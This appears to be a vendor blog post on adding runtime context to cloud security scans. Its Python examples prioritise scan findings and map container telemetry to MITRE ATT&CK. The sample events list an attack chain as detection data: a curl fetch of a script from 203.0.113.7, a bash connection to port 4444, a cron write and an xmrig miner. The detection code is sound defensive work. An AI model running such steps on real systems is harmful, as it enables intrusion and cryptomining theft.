Runtime Context​: What is it and Why is it Critical to Your Cloud Security?

March 6, 2024

We have discussed how adding 'runtime context' to static security scans reduces alert fatigue and lets teams prioritize protection and remediation within a risk-based framework. What we have not yet shared is which kinds of runtime context we use to achieve that. Three of them are described below.

Deep Packet Inspection

Inspection has to cover north-south traffic (crossing the perimeter) as well as east-west traffic (between workloads), and it has to see traffic that is encrypted on the wire as well as plaintext. In practice that means capturing payloads on the host before encryption or after TLS termination, because a sensor cannot read TLS ciphertext off the wire. With that visibility, teams can match traffic against Emerging Threats rulesets and the ModSecurity Core Rule Set (CRS).

Benefits of DPI in the cloud include:

  1. Comprehensive and granular inspection of network traffic, enabling early detection and prevention of potential threats in real time.
  2. Support for regulatory compliance through fine-grained control and monitoring of network activity.

Correlated Telemetry Across Different Modalities of System Behavior

Teams must be able to observe and correlate anomalous behavior across filesystems, processes and system calls, and network traffic, and to tie those observations back to security scan results and the SBOM of what is deployed.

Benefits of correlation include:

  1. Early detection of advanced threats: an anomaly in one modality (an unexpected process, say) becomes the trigger to examine the others (its file writes and network connections) before the attack progresses.
  2. Better incident response from a holistic view of the sequence of events.
  3. Better understanding of dependencies between workloads, which is what makes a scoped response possible.
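As an added example (not Deepfence's code) of tying static findings to runtime telemetry, the block below joins SBOM-derived scan findings against process and socket telemetry: a finding is treated as actively exploitable only when the vulnerable package's files are executed or mapped by a running process that is reachable over the network, and findings whose package never runs are suppressed. The findings, processes and sockets are constructed; the vulnerability labels are placeholders rather than real CVE identifiers; and the "exposed" flag on a listening socket is assumed to come from the service/ingress configuration.

```python
"""Prioritise static scan findings with runtime context: a finding is only
"actively exploitable" when the vulnerable package is actually loaded by a
running process that is reachable over the network.

Added example, not Deepfence's code. Findings, process telemetry and
network telemetry are constructed; VULN-* labels are placeholders, not CVEs.
"""

# Static scan output: one finding per vulnerable package in the image SBOM.
# "paths" are the files that package installs (assumption: the scanner
# records them, e.g. from the package database).
FINDINGS = [
    {"id": "VULN-A", "package": "libssl", "severity": "critical",
     "paths": ["/usr/lib/libssl.so.3"]},
    {"id": "VULN-B", "package": "libxml2", "severity": "high",
     "paths": ["/usr/lib/libxml2.so.2"]},
    {"id": "VULN-C", "package": "curl", "severity": "high",
     "paths": ["/usr/bin/curl"]},
    {"id": "VULN-D", "package": "python3-requests", "severity": "medium",
     "paths": ["/usr/lib/python3/dist-packages/requests/__init__.py"]},
    {"id": "VULN-E", "package": "busybox", "severity": "critical",
     "paths": ["/bin/busybox"]},
]

# Runtime process telemetry: executable plus shared objects mapped into the
# process (as a sensor would read them from /proc/<pid>/maps).
PROCESSES = [
    {"container": "web-1", "pid": 101, "exe": "/usr/sbin/nginx",
     "maps": ["/usr/lib/libssl.so.3", "/usr/lib/libc.so.6"]},
    {"container": "worker-1", "pid": 202, "exe": "/usr/bin/python3",
     "maps": ["/usr/lib/libxml2.so.2", "/usr/lib/libc.so.6"]},
]

# Runtime network telemetry: listening sockets; "exposed" means reachable
# from outside the cluster (assumption: derived from service/ingress config).
SOCKETS = [
    {"container": "web-1", "pid": 101, "kind": "listen", "port": 443, "exposed": True},
    {"container": "worker-1", "pid": 202, "kind": "listen", "port": 9090, "exposed": False},
]

SEVERITY_RANK = {"critical": 0, "high": 1, "medium": 2, "low": 3}


def processes_using(finding, processes):
    """Processes whose executable or mapped libraries belong to the package."""
    targets = set(finding["paths"])
    return [p for p in processes
            if p["exe"] in targets or targets.intersection(p["maps"])]


def is_exposed(proc, sockets):
    return any(s["pid"] == proc["pid"] and s["container"] == proc["container"]
               and s["kind"] == "listen" and s["exposed"] for s in sockets)


def classify(finding, processes, sockets):
    users = processes_using(finding, processes)
    if not users:
        return "not-loaded"
    if any(is_exposed(p, sockets) for p in users):
        return "actively-exploitable"
    return "loaded-not-exposed"


def prioritize(findings, processes, sockets):
    """Annotate each finding with its runtime status and return them most
    urgent first: exposed, then merely loaded, then dormant; severity and
    finding id break ties."""
    order = {"actively-exploitable": 0, "loaded-not-exposed": 1, "not-loaded": 2}
    rows = []
    for f in findings:
        users = processes_using(f, processes)
        rows.append({**f, "status": classify(f, processes, sockets),
                     "containers": sorted({p["container"] for p in users})})
    rows.sort(key=lambda r: (order[r["status"]], SEVERITY_RANK[r["severity"]], r["id"]))
    return rows


def alert_reduction(rows):
    """Share of findings that need no alert because the package never runs."""
    dormant = sum(1 for r in rows if r["status"] == "not-loaded")
    return dormant / len(rows) if rows else 0.0


if __name__ == "__main__":
    ranked = prioritize(FINDINGS, PROCESSES, SOCKETS)
    for r in ranked:
        print(f'{r["id"]:8} {r["severity"]:9} {r["status"]:22} {r["containers"]}')
    print(f"alerts suppressed: {alert_reduction(ranked):.0%}")
```

On the constructed input only VULN-A (libssl mapped into an Internet-facing nginx) ranks as actively exploitable; VULN-B is loaded but not reachable; the remaining three packages are present in the image but never execute, so three of five findings generate no alert. The reduction figure depends entirely on how much of an image is dead weight at runtime, which is why it is computed rather than assumed.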

Behavioral Analysis Mapped to MITRE ATT&CK

Threat-actor events observed at runtime should be mapped to MITRE ATT&CK tactics and techniques and correlated across the stages of the cyber kill chain. Seeing these TTPs in sequence lets organizations understand exactly how a threat actor moves within the environment to execute a successful attack, rather than treating each step as an isolated alert.

Benefits of Behavioral Analysis include:

  1. Early threat detection and prevention
  2. Improved incident response and mitigation
  3. Reduced risk and enhanced security posture
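As an added example (not Deepfence's code) of the behavioral analysis described above, the block below maps constructed runtime events from three modalities (process, file, network) to ATT&CK techniques, groups the hits per container in time order, and flags a container whose hits span several tactics of the kill chain as one multi-stage incident. The detection heuristics and sample events are constructed; the technique IDs and tactic names are the real ATT&CK Enterprise ones; the assumption that a network event carries the owning process's executable reflects a sensor that ties sockets to processes.

```python
"""Map runtime telemetry to MITRE ATT&CK techniques and chain the hits per
container in kill-chain order, so a sequence of tactics produces one
incident instead of several unrelated alerts.

Added example, not Deepfence's code. Heuristics and sample events are
constructed; technique IDs and tactic names are the real ATT&CK ones.
"""
from collections import defaultdict

# ATT&CK Enterprise tactics in kill-chain order (used to sort a chain).
TACTIC_ORDER = [
    "Initial Access", "Execution", "Persistence", "Privilege Escalation",
    "Defense Evasion", "Credential Access", "Discovery", "Lateral Movement",
    "Collection", "Command and Control", "Exfiltration", "Impact",
]

WEB_SERVERS = {"nginx", "apache2", "httpd", "php-fpm", "java", "node"}
SHELLS = {"sh", "bash", "dash", "zsh"}
DOWNLOADERS = {"curl", "wget"}
MINERS = {"xmrig", "minerd"}


def classify_event(ev):
    """Return (technique_id, technique_name, tactic) for an event, or None.
    Each rule is a constructed heuristic over one telemetry modality."""
    kind = ev["kind"]
    if kind == "process":
        exe, parent, argv = ev["exe"], ev.get("parent", ""), ev.get("argv", [])
        if parent in WEB_SERVERS and exe in SHELLS:
            return ("T1059.004", "Unix Shell", "Execution")
        if exe in DOWNLOADERS and any(a.startswith(("http://", "https://")) for a in argv):
            return ("T1105", "Ingress Tool Transfer", "Command and Control")
        if exe in MINERS or any("stratum+tcp://" in a for a in argv):
            return ("T1496", "Resource Hijacking", "Impact")
    elif kind == "file":
        if ev["path"].startswith(("/etc/cron.d/", "/var/spool/cron/")):
            return ("T1053.003", "Cron", "Persistence")
    elif kind == "network":
        # Assumption: the sensor attributes the socket to its owning process.
        if ev["exe"] in SHELLS and ev["dst_port"] not in (80, 443):
            return ("T1571", "Non-Standard Port", "Command and Control")
    return None


def build_chains(events, min_tactics=3):
    """Group classified events by container in time order. A container whose
    hits span at least `min_tactics` distinct tactics is flagged as a
    multi-stage attack; the tactics are reported in kill-chain order."""
    by_container = defaultdict(list)
    for ev in sorted(events, key=lambda e: e["ts"]):
        hit = classify_event(ev)
        if hit:
            tid, name, tactic = hit
            by_container[ev["container"]].append(
                {"ts": ev["ts"], "technique": tid, "name": name, "tactic": tactic})
    chains = {}
    for container, hits in by_container.items():
        tactics = sorted({h["tactic"] for h in hits}, key=TACTIC_ORDER.index)
        chains[container] = {"hits": hits, "tactics": tactics,
                             "flagged": len(tactics) >= min_tactics}
    return chains


# Constructed sample telemetry; ts is seconds from the first event.
SAMPLE_EVENTS = [
    {"ts": 0, "container": "web-1", "kind": "process", "exe": "sh",
     "parent": "nginx", "argv": ["sh", "-c", "id"]},
    {"ts": 5, "container": "web-1", "kind": "process", "exe": "curl",
     "parent": "sh", "argv": ["curl", "-s", "http://203.0.113.7/x.sh"]},
    {"ts": 9, "container": "web-1", "kind": "network", "exe": "bash",
     "dst": "203.0.113.7", "dst_port": 4444},
    {"ts": 12, "container": "web-1", "kind": "file",
     "path": "/etc/cron.d/update", "op": "write"},
    {"ts": 20, "container": "web-1", "kind": "process", "exe": "xmrig",
     "parent": "bash", "argv": ["xmrig", "-o", "stratum+tcp://pool.example:3333"]},
    # A build job fetching a release artifact: one hit, not a chain.
    {"ts": 3, "container": "build-1", "kind": "process", "exe": "curl",
     "parent": "bash", "argv": ["curl", "-O", "https://releases.example/app.tgz"]},
    # Routine log write, never classified.
    {"ts": 4, "container": "web-1", "kind": "file",
     "path": "/var/log/nginx/access.log", "op": "write"},
]

if __name__ == "__main__":
    for container, chain in build_chains(SAMPLE_EVENTS).items():
        print(container, "flagged" if chain["flagged"] else "ok", chain["tactics"])
        for h in chain["hits"]:
            print(f'  t+{h["ts"]:>3}s {h["technique"]:10} {h["name"]} ({h["tactic"]})')
```

For web-1 the five hits read as a recognisable kill chain (a shell spawned by the web server, a tool download, a connection out on a non-standard port, a cron entry, then a miner), spanning Execution, Persistence, Command and Control and Impact, so the container is raised as one incident. The lone curl in build-1 maps to a single technique and stays below the threshold, which is the point of sequencing TTPs rather than alerting on each in isolation.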

Taken together, this additional 'runtime context' reduces alert fatigue because it focuses attention on the threats actively at work against a cloud environment and on the findings that are actually exploitable given what is running. Deepfence cites a 97% reduction in alerts with this approach.

If you want to learn more about how Deepfence's cloud-native application protection platform implements runtime context to help better your security posture, schedule a demo with Ryan Smith, our Head of Product.